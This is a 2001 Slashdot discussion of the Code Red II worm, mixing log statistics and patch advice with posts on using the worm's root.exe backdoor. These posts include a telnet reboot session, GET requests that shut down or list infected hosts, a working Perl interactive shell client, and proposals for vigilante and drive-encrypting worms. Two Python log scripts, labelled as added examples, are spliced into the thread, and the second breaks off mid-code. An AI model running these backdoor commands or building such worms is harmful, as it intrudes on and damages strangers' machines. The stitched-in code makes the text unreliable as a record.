Yeah, it's much harder to install Apache. You have to remember how to type "apt-get install apache". Fortunately the Debian people tend to stay pretty well ahead of the security issues, so if you apt-get update ; apt-get upgrade on a regular basis, any newly discovered vulnerabilities will get fixed. Not that Apache's had any major vulnerabilities in a long, long time. Maybe the solution would be to port apt to Windows...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I'll try to take this one...
Snort has to inspect traffic as it's coming in. If a machine on your subnet doesn't have port 80 open, then the initial connection will be refused.. therefore the GET request will never be sent, and snort cannot log the attempt.
I opened port 80 on my firewall, but used xinetd to route all incoming connections to netcat, a program that just routes all incoming data to /dev/null. That way, the request will actually come into my firewall (and go directly to /dev/null) so that snort will be able to watch that data as it comes in.
Snort isn't going to report ALL connection attempts to port 80 on your subnet, only CodeRed infection attempts, which can ONLY occur after a connection to port 80 was successfully made.. get it?
CodeRed can't send the infection attempt until it connects to port 80. Clear enough for you?
Intelligent Life on Earth
DAMIT! that JUST added that, i swear!
this is my sig.
Also, once reinfected (by whatever means), I would presume that the rename would fail.
Renaming c:\explorer.exe should help.
- Sam Ruby
Check out this heise.de article (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum. May be worth a look.
"rundll.exe user.exe,ExitWindows", don't forget to do an echo "I have shut you down you were spreading coderedII" > c:\\whyIshutYOUdown.txt
They're not doing a very good job of it, because about 30% of the code red hits on my server today are from @home addresses.
Edward Burr
Having a smoking section in a restaurant is like having a peeing section in a swimming pool.
Zolof is considered to be the cause of Phill Hartman's wife's death rampage, and the school shootings in Colorado and Atlanta. Watch TV for the commercials for a maddening hell where you want to kill those around you.
Checking my web logs, I only see 4 Code Red IIs. Of course, I'm swamped with Code Red the First attacks. Thankfully, running Apache, all my servers do is say "huh?" and log it. Linux condoms are great for stopping Microsoft transmitted diseases.
We don't have a state-run media we have a media-run state.
Damn. I knew I should have went with Geico!
just strokin'
After reading the post, I installed ZoneAlarm just for fun on the win2k box here at home (no, IIS is not installed :)). In the last 30 minutes I have had 20 hits to port 80, all of them web sites. When checked on Netcraft all were IIS/NT sites. My guess is it's Code Red II. Most hits coming from my Subnet 203.79.xxx.xxx, hidden down here in lill old New Zealand. Most of the sites are in an unreadable Asian language. So I'm guessing Asia shares part of the subnet that my ISP uses.
Be interesting to see what's in the news tomorrow morning when I get to work. *gets all excited*
Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.
Even Slashdot wants to hide some things
Yikes... their opening sentence does not bode well for the technical content in the rest of the article...
"IT WAS NOT IMMEDIATELY clear if the new worm was a variant of Code Red or just a nastier copycat..."
Mmmkay...
"And like that
might I suggest doing root.exe last? you don't wanna close your hole for fixing the stuff :)
I've got about 5000 hits for both versions combined since yesterday morning on the 10 virtual sites on my box. Sheesh. This is bad (for IIS users that is).
Female Prison Rape in NY
Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)
Interesting.
Also...
Some states/jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so the above limitation or exclusion may not apply to you.
Does this really mean anything? Could somebody in some state conceivably sue them successfully? The rest of the EULA is an absolute, complete, iron-clad denial of any liability whatsoever. This last sentence is the only shred of hope I could find.
OTOH, be careful what you wish for. The GPL has similar disclaimers...
It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.
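The octet bookkeeping described in this post (how many scanning sources share the server's first octet, how many share the first two) is easy to automate from an Apache access log, and the same pass can separate the NNNN-padded Code Red v1/v2 requests from the XXXX-padded Code Red II ones, as the grep counts elsewhere in this thread do by hand. The following Python script is an added example, not code from this post or from Slashdot; the log lines and the local address 24.10.5.200 are constructed for illustration and do not come from anyone's real logs.

```python
"""Classify Code Red probes in an Apache access log and measure how
'local' their sources are (same first octet / same first two octets).
Added example; sample data below is constructed, not real log data."""
import re
from collections import Counter

# Constructed Apache combined-log lines (labelled as such; not from the page).
SAMPLE_LOG = """\
24.10.20.81 - - [04/Aug/2001:19:50:18 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 -
24.43.198.115 - - [04/Aug/2001:19:51:30 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 -
24.102.17.144 - - [04/Aug/2001:19:58:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 -
152.72.3.9 - - [04/Aug/2001:20:01:11 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 -
24.10.77.5 - - [04/Aug/2001:20:02:40 -0400] "GET /index.html HTTP/1.0" 200 1234
24.10.20.81 - - [04/Aug/2001:20:05:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
"""

# Apache common/combined log: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def classify(path):
    """Map a request path to a worm family, or None for ordinary traffic."""
    if path.startswith("/default.ida?"):
        query = path[len("/default.ida?"):]
        if query.startswith("N"):
            return "CodeRed v1/v2"      # original worm pads the overflow with N
        if query.startswith("X"):
            return "CodeRed II"         # CRII pads with X
        return "default.ida (unknown padding)"
    if path.lower().startswith("/scripts/root.exe"):
        return "root.exe probe"         # someone looking for the CRII backdoor
    return None


def parse_line(line):
    """Parse one access-log line; returns a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["family"] = classify(rec["path"])
    return rec


def locality(src, local_ip):
    """How much of the address the source shares with us (dotted-quad only)."""
    s, l = src.split("."), local_ip.split(".")
    if len(s) != 4 or not all(p.isdigit() for p in s):
        return "hostname (not an IP)"   # logs with HostnameLookups on
    if s[:2] == l[:2]:
        return "same /16"
    if s[0] == l[0]:
        return "same /8"
    return "elsewhere"


def summarize(log_text, local_ip):
    """Count worm-related requests by family and by source locality."""
    by_family, by_locality = Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["family"] is None:
            continue                    # unparseable or ordinary traffic
        by_family[rec["family"]] += 1
        by_locality[locality(rec["ip"], local_ip)] += 1
    return {"by_family": dict(by_family), "by_locality": dict(by_locality)}


if __name__ == "__main__":
    for key, counts in summarize(SAMPLE_LOG, "24.10.5.200").items():
        print(key)
        for name, n in sorted(counts.items(), key=lambda kv: -kv[1]):
            print(f"  {n:5d}  {name}")
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents and the local address with your server's; the "same /16" and "same /8" buckets give the two numbers the post reports by hand, and the root.exe bucket separates the scans from the follow-up probes that other posts in this thread mention.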
And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?
just complain to cisco how your vender is out of business so cannot supply it and you expect them to supply it to you for free or you will be calling the better business bureau and they will cough it up... worked for me!
Isn't the default a 'workstation' install which doesn't install Apache? Also, there's now a firewall enable by default, you would have to open port 80 to let anybody connect.
@ home doesn't even use IIS. It's the users! People are getting this on DSL TOO!
ARPs are fun. I'm getting about 50,000 of them...
As long as they don't change that to the worth of their software, or $5 US, wichever is more.
--I assume full responsibility for my actions, except the ones that are someone else's fault.
Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
Aren't you the Wipo Troll?
Karma whore!
The biggest problem here is the behavior that microsoft encourages.
They encourage both ease and laziness. They go after the users that will use the default setting and they make their software very easy to use, by requiring little or no grasp on the concepts being applied.
There are lots of linux distros who are also encouraging laziness.
Now this is all fine and good as long as these companies take the responsibility to make their software secure. If they are expecting users who do not know what they are doing, how can they ever expect them to patch their software?
These morons, by not patching their systems, are broadcasting their own termination notices.
We all know it won't be as entertaining as the first one...
-
hadmacker x & Aurel
Disagree. Apache doesn't answer requests as root, and the apache user (usually nobody, apache or httpd) can't write anywhere useful. IIS answers requests as the kernel. ACLs? What ACLs? Banzaaai!
I also routinely mount
There's also the issue of change and diversity. For example, older Apaches tend to default to
Mandrake installed in a server configuration does start a web server (and other things), but it specifically tells you about it during installation, and you have to click [Yes] to make it happen. They also do things like starting with ALL:ALL:DENY in hosts.deny, meaning that even with services running, a cracker's hope is likely to end in futility. Many packagers are following suit.
Debian's automatic updates also take the dodo-or-busy sysadmin out of the loop. Mandrake, RedHat and others are following suit.
Summary: no, we wouldn't. Even though there are twice as many Apache sites as IIS. OTOH if M$ also had 95% penetration of the web server market, the Internet as we know it would be history by now.
Got time? Spend some of it coding or testing
where are my mod points when i need them??
...and I want to know if I'll get spanked for sending my log (367 entries and growing quite quickly) of these default.ida? requests to abuse@microsoft.com ;-)
I thought that had been well documented...
:)
:)
Even though your webmin feature has been turned off, your cisco is still accepting connections, and it still parses the default.ida?XXXXblah, and that firmware crashes when it tries to parse a ? in a URL... There's updated firmware for that device available... Go get it.
I can't say where, I haven't got one.
The two most common things in the Universe are dark matter and stupidity.
I've received 172 Code Red II attempts today alone (as opposed to 22 Code Red I attempts). Code Red II attempts started at 10:01am (CST) and continue even now. It doesn't appear to be affecting my speed at all (I'm on a DSL line) or even the general speed of the Internet at large, but it's definitely annoying log clutter.
Hmm, make that 173.
Legality aside, why doesn't someone write a worm that will make infected hosts download the patch and run it, then reboot themselves? Or at least power off the infected PCs. Now that would be useful.
Actually you don't need 'cat' or 'wc' here. This works for me, and gets all of my domains/IPs in one swoop:
grep -c default.ida\?XXX /home/*/logs/access.today
Or for gzipped files:
zcat /home/*/logs/*.gz |grep -c default.ida\?XXX
- Jman
NGWave - Fast Sound Editor for Windows
Sounds a bit like the way they're going with SELinux. And yeah, a capability-based OS would rock. Sadly, neither contender for market share (be it any version of 'doze or the various UNIXes/Linuxes) has it yet :(
For those of you with the free time and desire to write code to make the world a better place, it'd be a hell of a good project to get involved with.
[root@server httpd]# grep -c default.ida?NNNNNNNNNNN access_log
98
[root@server httpd]# grep -c default.ida?XXXXXXXXXXX access_log
163
the XXXX's are apparently CR2. Looking at the #'s... *joy* =\
It depends on your machine's neighbors. If it's in a subnet with a lot of vulnerable Microsoft machines, it's going to get hammered. If it's in a well-run subnet, it will only see the odd random probes.
Machines I have in colo centers with small numbers of IPs (backup name servers, etc.) are really getting the treatment. Likewise the servers in a UUnet /26 (so presumably someone else in the Class C is an MS shop - never imagined I'd care). The rest of the stuff, in scattered /24s, is not seeing much of it at all (usually 5 or 6 log entries at this point).
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
Oh, just Windows98... So she can't get infected...
That may be the stupidest Linux advocacy I have ever heard.
I prefer the thing I've heard pool players say. It's a combination shot, so they "combinate".
This next song is very sad. Please clap along. -- Robin Zander
I just invented a new drinking game: the code red log hunt.
You sit at your computer late at night (preferably with a few others around, if you have anyone to share the night with) and enter the addresses filling your logs as they come. If it's the generic IIS "this page isn't here" or "under construction" or other such nonsense, no drink. But if you get a real site, SLAM ONE DOWN!
this is too much fun. I hope I have enough booze for the next few hours.
I was a bit skeptical of the numbers you guys are posting about the attacks, but when I looked at my server's logs for a number of IP addresses I came up with, get this, 9012 individual attacks. Holy crap.
xx.xx.xx.xx - - [04/Aug/2001:17:59:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe? ...
SO... someone was trying to exploit the backdoor. Could this be used as another signature to scan for.?
If these viruses/worms/trojans/what have you are designed to make the general public aware of the design faults of the Windows operating system then why don't they write them to do something even more drastic like install Linux or one of the BSDs* over top of the existing OS?
The ideal code red worm in my opinion would take the contents of a website, send it off to another infected host, go about its business installing an alternative OS and then bring back the data and have the system up and running again with the alternative OS. This would bring up all the uproar about the problems which is what the writer wants, while seemingly solving a problem at the same time. Plus it gives all those administrators that are stuck working with Windows but want to switch to something else their chance!
* yes I know that Linux and *BSD have their fair share of security problems too, I am merely using them as an example.
That's really nice!
Here are my logs: here.
Only 34 so far, but I only decided to open up apache to these this afternoon...
Cheers for that!
Not to nitpick, but this isn't "Code Red 2". The first strain of the Code Red worm had a broken random IP address generator, so it failed to propagate effectively. The one that stirred up so much fuss last month (and again last Wednesday) was CRv2, the same worm with the random address stuff repaired. I don't think that "Code Red 3" would be an appropriate descriptor, either, as there are undoubtedly many other variations going around. I've been calling it "Code Red X", for obvious reasons.
Secondly, you can reboot a Windows machine from the DOS prompt. Here's how:
lebowski:pts/1% telnet infected.host.net 80
Trying 24.1.1.1
Connected to infected.host.net.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 1984 05:18:57 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2183]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts> echo g=ffff:0|debug
Disclaimer: I haven't looked closely enough at this worm to know what rebooting an infected host will do. With CRv2, a simple reboot would make it stop propagating itself. If CR-X behaves the same way, we could probably put a damper on this scourge with a simple Perl script that connects to infected hosts and sends the reboot command.
Gratuitous Anti-MS Comment: We all know what the real problem is here.
I found out an easy way to slow down Code Red's scanning progress off a certain security site. Respond to the initial SYN packet with a SYN/ACK, but then don't acknowledge any further packets. The other side will spend several minutes retrying to send the worm to you, before finally giving up. I did this by adding this simple ipchains rule to my firewall (no, I haven't figured out iptables yet): ipchains -I input -j DENY -p tcp -s 0.0.0.0/0 1024:65535 -d $MY_IP 80 ! -y Of course, if you actually run a webserver, which I don't, that would be a bad thing to do. Also, it is possible to get a command prompt on most infected servers, by telnetting to port 80 of the machine and doing an HTTP request for /scripts/root.exe. Surely it must be possible to either warn the administrator, clean the machine, or at least knock the machine off the network from there? I'd investigate it more myself, but I've heard enough horror stories about people investigating hacked systems whose houses get raided by the FBI or something similar that I think I'll stick to more passive resistance. :)
That's for sure.
I think a way to bang it into everyone's head is to write some worm that will encrypt the Windows user's hard drive for a random amount of time (say 14-21 days.) And whenever they try to boot, they get some sort of message warning them about the dangers of clicking on all things, running unpatched software, running M$ software in general.
They'd remember that. And it would get a lot of press.
Already done it (well, not crashing, but I email hostmaster@their.domain), just do:
AddHandler cgi-script .ida
In your httpd.conf and make a little perl script or something called default.ida to log it. It's been great fun, shoulda been to bed hours ago, but I'm playing around with my script instead. =)
WWJD? JWRTFM!!!
Nope. They probed you first, so it's just "fair retaliation". And "fair retaliation" is an integral part of the anti-piracy laws, which Supreme Court insisted to add in order to keep the law in line with the Second Amendment of the Constitution ;-)
This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.
Indeed this does work. What I find interesting is that the majority of the IPs I've checked from my router logs have the stock, "Under Construction" IIS page from a new install and that the NT/2000 and Inetpub dirs have very recent creation dates associated with them. What I gather from this is that possibly these boxes were deliberately created for Code Red's sake by the curious. Maybe they just want to see what would happen. However, the fact that the IPs are scanning me suggests that they are not blocking the worm's ability to scan others, all the while allowing it to propagate. That in itself is bad news in my eyes.
311 here, linux server also running apache =)
Having said that, you could kill off a Windows PC by issuing
GET /scripts/root.exe?/c+SHUTDOWN
Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.
If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)
my other sig is a 500 page novel
This will not work. How is your worm going to spread if you fix the system?
The above is not worth reading.
OK, here is the story:
<OS Vendor> released <OS Version> and had <software> enabled by default. A bug was found in <software>, so <OS Vendor> released a patch. Most admins didn't install the patch for some reason or another. A while later, someone wrote a worm that exploited the bug. This worm spread like wildfire and infected a lot of servers.
Filling in the blanks:
<OS Vendor>=RedHat
<OS Version>RedHat 7.0
<software>=Bind
The only reason this is more devastating to the net than the Bind exploit was is because MS has a higher installed base. If RedHat had the same installed base, the effects would have probably been much worse.
So where is your call to have RedHat tarred and feathered?
Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
You left out some key facts:
- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.
"And like that
Wanna have your own complete copy?
nc -v -L -p 80 -o hex.dump > text.dump
Works with the unix and win32 version of netcat. I have had a window open watching traffic coming in on port 80 for a couple of days now; it's really weird to know port 80 and 111 are apparently that interesting on a normal dialup provider's IP range.
thx!!!!!!!!!
There's got to be a legal basis for it somewhere.
Thanks to you, you just infected my IIS 5.0 server. I will now sue your pants off.
http://support.visi.com/dsl/242/
I'd suspect that you could also find it this update using google (look for "c675.2.4.2.bin" or something equivalent ...)
Anyone have a link for the 2.4.2 firmware? I found 2.4.1, but no 2.4.2. I'm a Qwest DSL customer, so Cisco TAC tells me to talk to them, but they won't talk to me because qwest.net isn't my ISP. My local ISP is very good, but aren't big enough to get decent service for Cisco and get things like this. So I'm stuck, and will soon be out of town for 10 days and don't want my DSL router to lock up and cause me to lose email...
anyone have commands to do this for linux 2.2 kernels?
The CERT alert is explicit that the worm only infects NT/2000 machines running IIS. Why is the Windows 98 Personal Web Server (a limited version of IIS 4) not vulnerable?
John Faughnan
jfaughnan@spamcop.net
And it doesn't have the deltree command. Del functions the same as deltree, except with a y/n prompt.
I noticed this afternoon, I could not make any calls on my cell phone. I called customer support several times. They were busy. I guessed they were having problems with their network. My friend, who is on a different network (I am on Rogers AT&T Canada, he is on Fido Canada), also could not make any calls. Could it be that this worm brought down some cell phone networks?
This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?
Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.
It would be really interesting seeing a few different Code Red's going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.
As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.
Telnet into your router. If this is disabled, plug in the management interface, use hyperterminal/terminal software/direct serial port access/however you do this. log in. enable.
set web port 81
set web disabled
write
reboot
....
exit
This is the only effective way I know of. As far as I know all CBOS are vulnerable. Don't expect to get pre-CR2 performance, though, as you are still receiving a decent chunk of extraneous traffic, and qwest's (or whomever your provider is) lines are fairly bogged, as is everyone else's.
-aaron
I find it odd that my OS X (Apache httpd) webserver is now inaccessible to the outside world because @Home has filtered port 80 my IP. Even my other IP is filtered on port 80, and it doesn't even have any services running. This sucks because other @Home customers who HAVE been bitten by the worm haven't had incoming requests on port 80 blocked. If @Home is going to start enforcing the TOS on users that aren't hosting warez servers or any high-bandwidth servers, then I'm going to cancel my subscription. My 128 kbps upstream cap is horrible enough.
Qworst does have the Cisco CBOS 2.4.1 firmware update available for the Cisco 675 which should fix the lockups caused by code red. But they've made it hard to find. It's at: http://www.qwest.com/dsl/customerservice/win675ups .html
Although they say windows only, the upgrade can be done with any terminal which supports xmodem transfers via the serial management cable. You don't need the wintel Cisco Commander software.
The upgrade via the qwest.net faq link to the qwest.net ppp mode conversion page only upgrades to 2.2.0, which doesn't help. Qwest.net does not know about the qwest.com page.
Qwest.net seems to be totally separate from qwest.com. Qwest.net are clueless idiots who support absolutely nothing except basic connectivity; qwest.com has the dsl people who can help with Cisco problems. Choose the "tier 1 LAN support" option when calling in to 888.777.9569.
This option seems to be available only if you choose the "business" dsl option instead of "home". I assume that means qwest megabit "deluxe" or "pro" accounts.
An added bonus is that qwest.com does not have the sucky midi hold music that repeats every 30 seconds.
Having said all this, I notice that 3 systems that I admin do not respond to ping tonight. I'll check them Sunday, but the upgrade does not seem to have solved the problem.
Hi, I'm a stupid IIS admin. Will somebody please tell me what this 'r00t' is?
Thanks!
Joe Blow
MCSE
For an interactive shell,
#!perl -w
use IO::Socket::INET;
use URI::Escape;
my $remote = "@ARGV";
die "usage: $0 host\n" unless length $remote;
while()
{
print "> ";
my $command = <STDIN>;
chomp $command;
$command = uri_escape($command);
my $s = IO::Socket::INET->new(PeerAddr=>$remote, PeerPort=>80);
die "Can't connect to $remote\n" unless $s;
print $s "GET /scripts/root.exe?/c+$command HTTP/1.0\n\n";
print while <$s>;
}
Oh, I didn't know that. I'm curious, does it send the windows' contents as a bitmap or does it actually send the GUI system calls over the line?
Monkey sense
well, you are wrong. plz search archives for "BIND", Sendmail (more problems than morris worm), WU-FTPD...etc..etc...etc...
it should work. BackOrifice2k had the same kind of ability. I was able to cmd winipcfg and notepad \autoexec.bat, and others to popup.
This is actually a Microsoft ploy... they are using it to gauge their share of the webserver market! I can see the headlines now... "Microsoft IIS the innovative leader in home web servers."
http://bike.stu.ph/rides - free GPS routes available for Garmin, Magellan, GPX and Google Earth
Someone should copyright the "code red algorithm". No. Wait. That would make it more popular.
Changing the name to "Code Bob" or "Clippy" might slow things down a bit.
one better than mcleodeight
can anyone confirm that this works? I want to take over control of default.ida for my virtual hosts to help kill this. sample script?
Nah, it's a country wide civic holiday, so it'll have different names in different areas.
Vintage computer games and RPG books available. Email me if you're interested.
actually, you can do remote gui logins through terminal services. All it does is run your commands as a separate thread and then pipe the output back to your client to be processed by your machine. It has some security holes in it though, another quality product from microsoft.
I'm using Win98 with @home, and Zone Alarm as the firewall. I usually get maybe 10-20 hits a day, but just like everyone else, when I saw this article I pulled up the log and I was banged over 400 times within the course of 4 hours, the vast majority coming from 65.2.x.x. I wouldn't be concerned, but what if there's a crIII worm that does affect Win 98 machines? Luckily I have Linux on a second partition, and I even got @home working with it. (Just in the course of typing this message I got hit another 5 times, and the receive light is flickering like a worn out neon light.)
2001-08-04 14:35:16 24.180.74.2 was first for me.
Vibrating Heat Beads and Crystal Meth. Jimmy, I'm the DEVIL!
I'm running NetPresenz on an old PPC 7200/75 I have just as a staging area for several projects of mine. I've noticed a significant increase in visits over the last few days. I'm just wondering how I would know if I'm being hit by the virus. I know my server can't be infected for a number of reasons, but I'm just curious to know if I'm being "attacked".
Pooty tweet
Hear, hear brother...I can't stand the whining "but there's no webmaster@...every IP address on the internet has to have a webmaster account" crap.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
I've read a lot of the messages here, and I think people/we should set precedent now that any system left open to a published exploit MAY BE ENTERED through that interface and the broken service stopped/disabled or the server shut down--at least in response to an active probe.
These distributed attacks are everyone's problem. I agree with the "house on fire" analogy someone else posted. It's time to stop gawking and start grabbing buckets.
Could someone post a windows script that will send a message locally to webmaster and then turn IIS off, and block it coming back up, at least until restart? (sorry, been way too long since I used windows) Maybe such counter-actions can be published along with exploits, and improve over time.
Think "copy-cat" incidents like Columbine.
I Browse at +4 Flamebait
Open Source Sysadmin
How many out-of-work sysadmins do you know?
It seems that thousands of US corporations have been persuaded that paying a knowledgeable person to run the server farm is a luxury. Haven't you seen the recent Microsoft TV ads? The computers just admin themselves now! Woo hoo!
yeah, that won't take any bandwidth to do...
look elsewhere in the discussion, people have figured it out
"Depression is merely anger without enthusiasm." - Anonymous
Who needs telnet?
Just type the following into a browser using one of the infected systems from your log file:
http://infected_system/scripts/root.exe?/c+dir+c:
You are greeted with a directory listing of the root of C:\!
I just scared the crap out myself by trying this, and it worked.
At least one compromised machine launched root.exe the first time it was touched this way, but then started responding with the error page.
Is this collateral damage as the ravening script-kiddies of the internet discover a new and vulnerable target? Or is it an attribute of the compromise itself?
about 170 attacks so far. (about 5/hour) I downloaded the patch back in late July. Point, click, click, reboot. That simple. Had I not downloaded the patch for my NT machine, my BlackIce Defender Firewall would've bounced the attacks anyway.... which it did. Lesson: When MS fails, get a firewall!
Nice analogy. Here in Seattle, every other year or so, the Snohomish river washes people's houses away, developers come along, build shoddy houses (because they only need to last for a few years), people from other parts of the country move into them, flood, repeat.
Microsoft builds shoddy software because by the time exploits are found, they can say "you really ought to upgrade to the latest and greatest, besides, it has all these new features". The software isn't any better, just less well known. If they were to stop for a second, build a stable, secure, extensible framework, they would be able to add all the "features" people are "asking for" without introducing more security flaws. However, that would be like building dikes to contain the flooding river. They would just rather move elsewhere.
haven't been paying attention have you???
PoizonBOx is a very famous (at least among them)group of defacers from Brasil.
I sent a log to Rogers telling them to notify the people to patch their computers. It would seem that both versions of the Code Red virus are spreading. grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' abuse@rogers.home.net
A couple of possibilities:
- the infected servers are just DoSed by the number of people scanning them back on a small connection
- IIS is actually running on WinNT/2K Workstation, which has a limit of something like 10 concurrent inbound TCP connections (exacerbated by HTTP/1.1, used by most browsers these days).
I'm gonna check the "well-known numbers" RFC, but
I did a little scan of one of the infectoids:
Ports open at:
21
25 (open mail relay too!)
80
135
139
443
445
1025
1027
2057
2162
2174
2200
2210
2214
2219
2227
2228
2257
2282
I recognize some of those ports, but surely
windows doesn't need all those ports open?
Anybody have ftp deep link equivalents of:
http://download.microsoft.com/download/winntsp/Patch/q300972/NT4/EN-US/Q300972i.exe
and
http://download.microsoft.com/download/win2000platform/Patch/q300972/NT5/EN-US/Q300972_W2K_SP3_x86_en.EXE
If somebody had deep linked versions of these via ftp, we could write a white hat worm easily.
Writing a worm to wget those would be a bitch, but ftp comes installed on all NT boxen... so it's easy.
Several machines listed in logs as attacking
show up on eeye.com's CodeRedScanner as not
being vulnerable to the index.ida exploit.
Is it possible that the CRII worm seals the hole?
Or maybe those servers have been patched already.
If you are replying to a clerk that doesn't give a rat's ass about complaints then nothing will happen. If you write to the CEO of the insurance company then something might happen.
my bank used to run IIS for its online banking environment.
several months back, they switched to IBM's Apache variant. long before Code Red. and reimplemented their ASP code as java servlets.
well, it makes me feel better anyway :)
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
Download the patch. Put it on a floppy. Walk it over to the new system. Apply it.
Or just burn Service Pack 2 to a CD-R.... or put it on a network behind the firewall. Not that big of a deal.
I see XXX in my logs all the time, but then again that might have something to do with what I host ;-)
Not much unusual traffic here. i am relying on a firewall as i am running IIS unpatched on Win2k. and i won't be hit.. don't worry. :)
-A
i hope they do go down, all the fucking wannabe spammers, the email harvesters, and about 80% of the crack attacks come from @home addresses.
This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.
But I'm sure someone will create various flavors with the right jump points to hit all the IIS variants. Only a matter of time.
Top Most Bizarre/Disturbing Error Messages
So does this do anything differently?
"Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
Hey, what's wrong with 128Kbit unless you're streaming porn or something? My webserver runs just fine on my ISDN link.. can't get cable or DSL. :-(
Taken from http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0
Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.
Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda.
The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0.
Its funny. Laugh. Please?
Even if you don't like your mother-in-law, that's no reason to let her use Windows. Think about your wife, and HER feelings. Buy your mother-in-law a Mac today. Keep the domestic peace.
Ok folks. Promise to be good with the following.
If you use the following it should pop up a web browser on the screen of the infected computer (of course replace xxx.xxx... with the infected IP):
http://xxx.xxx.xxx.xxx/scripts/root.exe?+/c+start+http://www.digitalisland.com/codered/
Alternatively you can telnet into port 80 and type:
GET /scripts/root.exe?+/c+start+http://www.digitalisland.com/codered/
Now create them perl scripts and fix the world.
Dozings.com -- Its kinda funny... If you're as crazy as me.
I just set up a page-generator to give some statistics for my logs. Here it is.
;)
I thought I might use it at work tomorrow, but you guys can take a look at it.
My perl script is also up there, if you guys want it. It looks at the logs, and separates out Code Red 1 and Code Red 2 hits into different files. It also gathers a tiny bit of statistics, like # of code red 1 hits, # of code red 2 hits, and # of hits total.
The cool thing about my perl script is that it generates a new "index.html" for you every 30 seconds with updated statistics on it. (Not like that was hard to do though.)
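The poster's perl script is not on the page, so here is an added example (not the poster's code) of the same triage in Python: parse Apache access-log lines, split the .ida hits into the original Code Red (payload is a run of N's, as in the grep a few comments up) and Code Red II (a run of X's), count hits per source for an abuse mail, and count how many attackers sit in the server's own /16 and /8, which is the locality pattern the story describes. The log lines and the server address 24.10.99.7 are constructed for the example.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

SERVER_IP = "24.10.99.7"  # hypothetical address of the attacked server

# Constructed sample lines in Apache common log format, not from any real server.
SAMPLE_LOG = """\
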